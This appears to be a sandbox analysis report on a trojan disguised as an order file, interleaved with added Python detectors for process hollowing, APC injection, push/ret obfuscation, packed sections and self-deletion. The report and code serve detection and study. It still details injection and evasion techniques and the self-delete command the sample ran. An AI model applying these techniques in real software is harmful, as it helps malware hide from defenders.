Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD98F0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00FD98F0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00FD9860
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9840 NtDelayExecution,LdrInitializeThunk, 5_2_00FD9840
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD99A0 NtCreateSection,LdrInitializeThunk, 5_2_00FD99A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00FD9910
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9A50 NtCreateFile,LdrInitializeThunk, 5_2_00FD9A50
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9A20 NtResumeThread,LdrInitializeThunk, 5_2_00FD9A20
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9A00 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00FD9A00
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD95D0 NtClose,LdrInitializeThunk, 5_2_00FD95D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9540 NtReadFile,LdrInitializeThunk, 5_2_00FD9540
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD96E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00FD96E0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00FD9660
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9FE0 NtCreateMutant,LdrInitializeThunk, 5_2_00FD9FE0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD97A0 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00FD97A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9780 NtMapViewOfSection,LdrInitializeThunk, 5_2_00FD9780
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9710 NtQueryInformationToken,LdrInitializeThunk, 5_2_00FD9710
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD98A0 NtWriteVirtualMemory, 5_2_00FD98A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FDB040 NtSuspendThread, 5_2_00FDB040
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9820 NtEnumerateKey, 5_2_00FD9820
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD99D0 NtCreateProcessEx, 5_2_00FD99D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9950 NtQueueApcThread, 5_2_00FD9950
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9A80 NtOpenDirectoryObject, 5_2_00FD9A80
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9A10 NtQuerySection, 5_2_00FD9A10
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FDA3B0 NtGetContextThread, 5_2_00FDA3B0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9B00 NtSetValueKey, 5_2_00FD9B00
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD95F0 NtQueryInformationFile, 5_2_00FD95F0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9560 NtWriteFile, 5_2_00FD9560
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FDAD30 NtSetContextThread, 5_2_00FDAD30
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9520 NtWaitForSingleObject, 5_2_00FD9520
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD96D0 NtCreateKey, 5_2_00FD96D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9670 NtQueryInformationProcess, 5_2_00FD9670
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9650 NtQueryValueKey, 5_2_00FD9650
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9610 NtEnumerateValueKey, 5_2_00FD9610
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FDA770 NtOpenThread, 5_2_00FDA770
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9770 NtSetInformationFile, 5_2_00FD9770
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9760 NtOpenProcess, 5_2_00FD9760
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD9730 NtQueryVirtualMemory, 5_2_00FD9730
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FDA710 NtOpenProcessToken, 5_2_00FDA710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839A50 NtCreateFile,LdrInitializeThunk, 14_2_03839A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038399A0 NtCreateSection,LdrInitializeThunk, 14_2_038399A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_03839910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839840 NtDelayExecution,LdrInitializeThunk, 14_2_03839840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_03839860
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839780 NtMapViewOfSection,LdrInitializeThunk, 14_2_03839780
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839FE0 NtCreateMutant,LdrInitializeThunk, 14_2_03839FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839710 NtQueryInformationToken,LdrInitializeThunk, 14_2_03839710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038396D0 NtCreateKey,LdrInitializeThunk, 14_2_038396D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038396E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_038396E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839650 NtQueryValueKey,LdrInitializeThunk, 14_2_03839650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_03839660
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038395D0 NtClose,LdrInitializeThunk, 14_2_038395D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839540 NtReadFile,LdrInitializeThunk, 14_2_03839540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0383A3B0 NtGetContextThread, 14_2_0383A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839B00 NtSetValueKey, 14_2_03839B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839A80 NtOpenDirectoryObject, 14_2_03839A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839A00 NtProtectVirtualMemory, 14_2_03839A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839A10 NtQuerySection, 14_2_03839A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839A20 NtResumeThread, 14_2_03839A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038399D0 NtCreateProcessEx, 14_2_038399D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839950 NtQueueApcThread, 14_2_03839950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038398A0 NtWriteVirtualMemory, 14_2_038398A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038398F0 NtReadVirtualMemory, 14_2_038398F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839820 NtEnumerateKey, 14_2_03839820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0383B040 NtSuspendThread, 14_2_0383B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038397A0 NtUnmapViewOfSection, 14_2_038397A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0383A710 NtOpenProcessToken, 14_2_0383A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839730 NtQueryVirtualMemory, 14_2_03839730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839760 NtOpenProcess, 14_2_03839760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0383A770 NtOpenThread, 14_2_0383A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839770 NtSetInformationFile, 14_2_03839770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839610 NtEnumerateValueKey, 14_2_03839610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839670 NtQueryInformationProcess, 14_2_03839670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038395F0 NtQueryInformationFile, 14_2_038395F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839520 NtWaitForSingleObject, 14_2_03839520
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0383AD30 NtSetContextThread, 14_2_0383AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03839560 NtWriteFile, 14_2_03839560
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B285F0 NtCreateFile, 14_2_00B285F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B286A0 NtReadFile, 14_2_00B286A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B287D0 NtAllocateVirtualMemory, 14_2_00B287D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B28720 NtClose, 14_2_00B28720
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B285EB NtCreateFile, 14_2_00B285EB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2869A NtReadFile, 14_2_00B2869A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B28643 NtCreateFile, 14_2_00B28643
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2871A NtClose, 14_2_00B2871A
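The native calls listed above for NETSTAT.EXE (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread, NtResumeThread) are the primitives of process hollowing and APC injection; what makes them evidence is their order. The following is an added example, not code from the report or from the malware: it checks an API trace for those ordered sequences. The NETSTAT.EXE trace is constructed from the function names above, in an order chosen for illustration; the benign trace is invented.

```python
"""Added example (not part of the Joe Sandbox report): check whether a native
API trace contains the ordered call sequences behind process hollowing and
APC injection.  The NETSTAT.EXE trace below is constructed from the function
names the report lists for process 14; the order is illustrative."""
from typing import Dict, List, Sequence, Tuple

# Each step is a tuple of acceptable call names (real loaders vary: a
# suspended host may come from NtCreateProcessEx or NtCreateUserProcess).
Step = Tuple[str, ...]
TECHNIQUES: Dict[str, List[Step]] = {
    "process_hollowing": [
        ("NtCreateProcessEx", "NtCreateUserProcess"),  # suspended host process
        ("NtUnmapViewOfSection",),                     # evict the host's image
        ("NtAllocateVirtualMemory",),                  # room for the payload
        ("NtWriteVirtualMemory",),                     # copy the payload in
        ("NtSetContextThread",),                       # redirect the entry point
        ("NtResumeThread",),                           # run it
    ],
    "apc_injection": [
        ("NtOpenProcess",),
        ("NtAllocateVirtualMemory",),
        ("NtWriteVirtualMemory",),
        ("NtOpenThread",),
        ("NtQueueApcThread",),                         # payload runs as a user APC
        ("NtResumeThread", "NtAlertResumeThread"),
    ],
}

def first_index(trace: Sequence[str], names: Step, start: int) -> int:
    """Earliest position >= start holding any of `names`, or -1."""
    best = -1
    for name in names:
        try:
            i = trace.index(name, start)
        except ValueError:
            continue
        if best < 0 or i < best:
            best = i
    return best

def match_sequence(trace: Sequence[str], pattern: List[Step]) -> List[int]:
    """Indices at which `pattern` occurs in `trace` as an ordered
    subsequence (other calls may sit between steps); [] if it does not."""
    hits: List[int] = []
    pos = 0
    for step in pattern:
        i = first_index(trace, step, pos)
        if i < 0:
            return []
        hits.append(i)
        pos = i + 1
    return hits

def score_trace(trace: Sequence[str]) -> Dict[str, List[int]]:
    """Every technique whose full sequence appears, with the matching indices."""
    result: Dict[str, List[int]] = {}
    for name, pattern in TECHNIQUES.items():
        hits = match_sequence(trace, pattern)
        if hits:
            result[name] = hits
    return result

# Constructed trace: the report's NETSTAT.EXE (process 14) native calls.
TRACE_NETSTAT = [
    "NtQueryInformationProcess", "NtOpenProcessToken", "NtCreateProcessEx",
    "NtQuerySection", "NtUnmapViewOfSection", "NtAllocateVirtualMemory",
    "NtProtectVirtualMemory", "NtWriteVirtualMemory", "NtReadVirtualMemory",
    "NtGetContextThread", "NtSetContextThread", "NtResumeThread",
    "NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtOpenThread", "NtQueueApcThread", "NtResumeThread", "NtClose",
]
# Constructed control: a process that only inspects another process.
TRACE_BENIGN = ["NtOpenProcess", "NtQueryInformationProcess", "NtClose"]

if __name__ == "__main__":
    print(score_trace(TRACE_NETSTAT))  # both techniques match
    print(score_trace(TRACE_BENIGN))   # {}
```

An ordered-subsequence match tolerates the extra calls a real trace carries (NtProtectVirtualMemory, NtGetContextThread) but still refuses a trace that merely imports the same functions in a different order, which is the difference between a loader and a debugger or a process viewer.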
Sample file name is different from the original file name gathered from version info
Source: Order No00020212910.exe Binary or memory string: OriginalFilename vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000000.00000002.289284673.00000000008C2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameLocalDataStoreHold.exe. vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000000.00000002.290003592.0000000001048000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000000.00000002.292344503.0000000007AC0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameTaskNode.dll4 vs Order No00020212910.exe
Source: Order No00020212910.exe Binary or memory string: OriginalFilename vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000005.00000000.286450090.0000000000522000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameLocalDataStoreHold.exe. vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000005.00000002.359585453.000000000108F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Order No00020212910.exe
Source: Order No00020212910.exe Binary or memory string: OriginalFilenameLocalDataStoreHold.exe. vs Order No00020212910.exe
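The signature above works by string extraction: the on-disk sample's version resource says OriginalFilename is LocalDataStoreHold.exe while the file was delivered as Order No00020212910.exe. The netstat.exe and ntdll.dll values come from process 5's memory, where the sample has mapped those modules before hollowing, so they describe the host binaries rather than the sample. The following added example (not code from the report) reproduces that scan over constructed byte blobs and compares the result with the on-disk name.

```python
"""Added example (not part of the Joe Sandbox report): pull every
OriginalFilename value out of a byte blob the way a string scan of a PE or a
memory dump would, and compare it with the name the file carries on disk.
The blobs below are constructed; the values mirror what the report found."""
from typing import Dict, List

KEY = "OriginalFilename".encode("utf-16-le")

def original_filenames(blob: bytes) -> List[str]:
    """Return each UTF-16LE OriginalFilename value in `blob`.

    VS_VERSIONINFO stores a String entry as key, NUL, WORD padding to a
    4-byte boundary, then the NUL-terminated value; memory dumps of loaded
    modules keep that layout.  Limitation of a plain scan: an empty value is
    indistinguishable from padding, so parse wValueLength from the String
    header if you have the resource intact."""
    found: List[str] = []
    pos = 0
    while True:
        i = blob.find(KEY, pos)
        if i < 0:
            return found
        pos = i + len(KEY)
        while blob[pos:pos + 2] == b"\x00\x00":      # key NUL + alignment pad
            pos += 2
        units = []
        while pos + 1 < len(blob) and blob[pos:pos + 2] != b"\x00\x00":
            units.append(blob[pos:pos + 2])
            pos += 2
        found.append(b"".join(units).decode("utf-16-le", errors="replace"))

def check_sample_name(disk_name: str, blob: bytes) -> Dict[str, object]:
    """Flag a file whose version resource names a different binary."""
    values = original_filenames(blob)
    return {
        "original_filenames": values,
        "mismatch": any(v.lower() != disk_name.lower() for v in values),
    }

def version_string(key: str, value: str) -> bytes:
    """Constructed helper: lay out one VS_VERSIONINFO String entry (key and
    value only; the wLength/wValueLength/wType header is omitted)."""
    out = key.encode("utf-16-le") + b"\x00\x00"
    if len(out) % 4:
        out += b"\x00\x00"
    return out + value.encode("utf-16-le") + b"\x00\x00"

# Constructed stand-in for the sample's own version resource.
SAMPLE_BLOB = (b"MZ\x90\x00" + b"\x00" * 12
               + version_string("CompanyName", "Contoso")
               + version_string("OriginalFilename", "LocalDataStoreHold.exe")
               + version_string("ProductName", "LocalDataStoreHold"))
# Constructed stand-in for a dump of a process that mapped netstat and ntdll:
# the values belong to those modules and say nothing about the sample.
HOST_DUMP = (version_string("OriginalFilename", "netstat.exe")
             + version_string("OriginalFilename", "ntdll.dll"))

if __name__ == "__main__":
    print(check_sample_name("Order No00020212910.exe", SAMPLE_BLOB))
    print(original_filenames(HOST_DUMP))
```

Run the check against the file on disk, not against a memory dump of a running process: once the sample has mapped other images, a dump contains their version strings too and the mismatch test loses its meaning.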
Source: Order No00020212910.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Order No00020212910.exe Virustotal: Detection: 24%
Source: Order No00020212910.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Order No00020212910.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Order No00020212910.exe 'C:\Users\user\Desktop\Order No00020212910.exe'
Source: C:\Users\user\Desktop\Order No00020212910.exe Process created: C:\Users\user\Desktop\Order No00020212910.exe C:\Users\user\Desktop\Order No00020212910.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order No00020212910.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
Source: C:\Users\user\Desktop\Order No00020212910.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order No00020212910.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@9/5
Source: C:\Users\user\Desktop\Order No00020212910.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: Order No00020212910.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Order No00020212910.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Order No00020212910.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Order No00020212910.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source: Binary string: netstat.pdb source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: Order No00020212910.exe, 00000005.00000002.359186565.0000000000F70000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000E.00000002.541418098.00000000038EF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Order No00020212910.exe, NETSTAT.EXE

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_008C9016 push esp; iretd 0_2_008C9017
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_02B81C7C push ebx; iretd 0_2_02B81C7A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_02B81C67 push ebx; iretd 0_2_02B81C7A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076CF8E7 push esi; ret 0_2_076CF8F5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041B399 push ecx; ret 5_2_0041B39F
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041CE1E push 4B5FDABCh; ret 5_2_0041CFA6
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00529016 push esp; iretd 5_2_00529017
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FED0D1 push ecx; ret 5_2_00FED0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0384D0D1 push ecx; ret 14_2_0384D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2B89C push eax; ret 14_2_00B2B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2B832 push eax; ret 14_2_00B2B838
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2B83B push eax; ret 14_2_00B2B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2B399 push ecx; ret 14_2_00B2B39F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2C48D push edi; ret 14_2_00B2C48F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2CE1E push 4B5FDABCh; ret 14_2_00B2CFA6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2B7E5 push eax; ret 14_2_00B2B838
Source: initial sample Static PE information: section name: .text entropy: 7.60777212837
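The entries above are two different idioms. `push imm32; ret` and `push reg; ret` are indirect jumps written so that a linear disassembler sees a function return instead of a branch (the 5_2_0041CE1E entry transfers control to 4B5FDABCh), and `push reg; iretd` abuses the interrupt-return instruction the same way. The .text entropy of 7.6078 bits per byte is a separate signal: ordinary compiled code sits well below 7, so a value that high points at compressed or encrypted content that is unpacked at run time. The following is an added example, not code from the report or from the sample: it flags those byte patterns in a constructed code buffer, also covering the `mov r32, fs:[30h]` PEB reads listed under Anti Debugging below, and computes section entropy. Only the 4B5FDABCh immediate is taken from the report.

```python
"""Added example (not part of the Joe Sandbox report): locate the push/ret
style control transfers the Data Obfuscation section lists, the
`mov r32, fs:[30h]` PEB reads listed under Anti Debugging, and score a
section's byte entropy.  The code buffer is constructed; only the
push 4B5FDABCh; ret immediate is taken from the report."""
import math
import re
import struct
from collections import Counter
from typing import List, Optional, Tuple

REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Byte-level patterns.  A raw scan has no instruction boundaries, so treat
# hits as candidates and confirm them in a disassembler; the report's offsets
# come from its own disassembly, not from a scan like this.
PATTERNS = [
    ("push imm32; ret",   re.compile(rb"\x68(.{4})\xC3", re.S)),
    ("push reg; ret",     re.compile(rb"([\x50-\x57])\xC3", re.S)),
    ("push reg; iretd",   re.compile(rb"([\x50-\x57])\xCF", re.S)),
    # 64 A1 disp32 (mov eax, fs:[disp32]) or 64 8B /r with mod=00 rm=101
    ("mov r32, fs:[30h]", re.compile(
        rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00", re.S)),
]

def scan_code(code: bytes) -> List[Tuple[int, str, Optional[str]]]:
    """(offset, pattern name, detail) for every candidate, sorted by offset.
    detail is the resolved jump target for push imm32; ret, the register for
    push reg; ret / iretd, and None for the PEB read."""
    hits: List[Tuple[int, str, Optional[str]]] = []
    for name, rx in PATTERNS:
        for m in rx.finditer(code):
            detail: Optional[str] = None
            if name == "push imm32; ret":
                detail = "0x%08x" % struct.unpack("<I", m.group(1))[0]
            elif name.startswith("push reg"):
                detail = REGS32[m.group(1)[0] - 0x50]
            hits.append((m.start(), name, detail))
    return sorted(hits)

def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def looks_packed(section: bytes, threshold: float = 7.0) -> bool:
    """Code sections of ordinary compiled x86 sit well below 7 bits/byte; the
    report measured 7.6078 for this sample's .text, which is in the range of
    compressed or encrypted content."""
    return shannon_entropy(section) > threshold

# Constructed buffer: a normal prologue followed by the obfuscation idioms.
CODE = (
    b"\x55\x8B\xEC"                   # push ebp; mov ebp, esp
    b"\x68\xBC\xDA\x5F\x4B\xC3"       # push 4B5FDABCh; ret  -> jmp 0x4B5FDABC
    b"\x90\x90"                       # nop; nop
    b"\x50\xC3"                       # push eax; ret        -> jmp eax
    b"\x64\xA1\x30\x00\x00\x00"       # mov eax, fs:[30h]    -> PEB
    b"\x64\x8B\x0D\x30\x00\x00\x00"   # mov ecx, fs:[30h]
    b"\x53\xCF"                       # push ebx; iretd
    b"\xC3"                           # ret
)

if __name__ == "__main__":
    for off, name, detail in scan_code(CODE):
        print(f"+0x{off:04x} {name:<20} {detail or ''}")
    print("entropy", round(shannon_entropy(CODE), 3))
```

The PEB read is not malicious on its own; the runtime and every statically linked CRT touch fs:[30h] for loader data. It becomes interesting when it feeds a BeingDebugged check or an export walk that resolves the Nt* functions listed earlier without an import table, which is why the report counts it under anti-debugging.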

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del 'C:\Users\user\Desktop\Order No00020212910.exe'
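The deletion is issued by a process that never executed the sample: the tree the report shows is explorer.exe spawning NETSTAT.EXE (hollowed), and NETSTAT.EXE spawning cmd.exe with `/c del` on the sample's path, while the sample itself sits in a separate branch under explorer.exe. A rule that only looks for a process deleting its own parent's image misses this. The following is an added example, not code from the report: over process-creation records it finds any `cmd /c del` whose target is the image of a process that ran in the session, walks the deleter's ancestry, and reports whether the deleter descends from the victim. The records are constructed from the report's process tree; PIDs are illustrative except 7040, which the report names for the sample.

```python
"""Added example (not part of the Joe Sandbox report): over process-creation
records, find a `cmd /c del` whose target is the image of a process that ran
in the same session, and report the chain that issued it.  The records are
constructed from the process tree the report shows; PIDs are illustrative
except 7040, which the report names for the sample."""
import re
from typing import Dict, List, Optional

SAMPLE = r"C:\Users\user\Desktop\Order No00020212910.exe"

# cmd /c del [/f /q ...] "path" | 'path' | path
DEL_RE = re.compile(r"""/c\s+del\b(?:\s+/[fqa])*\s+(?:"([^"]+)"|'([^']+)'|(\S+))""", re.I)

def deleted_path(cmdline: str) -> Optional[str]:
    """Path named by a `/c del` in `cmdline`, or None."""
    m = DEL_RE.search(cmdline)
    return next(g for g in m.groups() if g) if m else None

def ancestry(by_pid: Dict[int, dict], pid: int) -> List[int]:
    """pid and its parents, nearest first, stopping at unknown or cyclic pids."""
    chain: List[int] = []
    while pid in by_pid and pid not in chain:
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain

def find_image_deletions(procs: List[dict]) -> List[dict]:
    """One finding per process that deletes an image some process ran as.

    descendant_of_victim is True for the classic self-delete (the sample or
    its child spawns the cmd); False when an unrelated process does it, which
    is what injection into explorer.exe and a hollowed NETSTAT.EXE produce."""
    by_pid = {p["pid"]: p for p in procs}
    by_image: Dict[str, List[int]] = {}
    for p in procs:
        by_image.setdefault(p["image"].lower(), []).append(p["pid"])
    findings = []
    for p in procs:
        target = deleted_path(p["cmdline"])
        if target is None:
            continue
        victims = by_image.get(target.lower())
        if not victims:
            continue  # deleting something that never ran is out of scope here
        chain = ancestry(by_pid, p["pid"])
        findings.append({
            "deleter_pid": p["pid"],
            "deleted": target,
            "executed_as": victims,
            "chain": [by_pid[x]["image"].rsplit("\\", 1)[-1] for x in chain],
            "descendant_of_victim": any(v in chain for v in victims),
        })
    return findings

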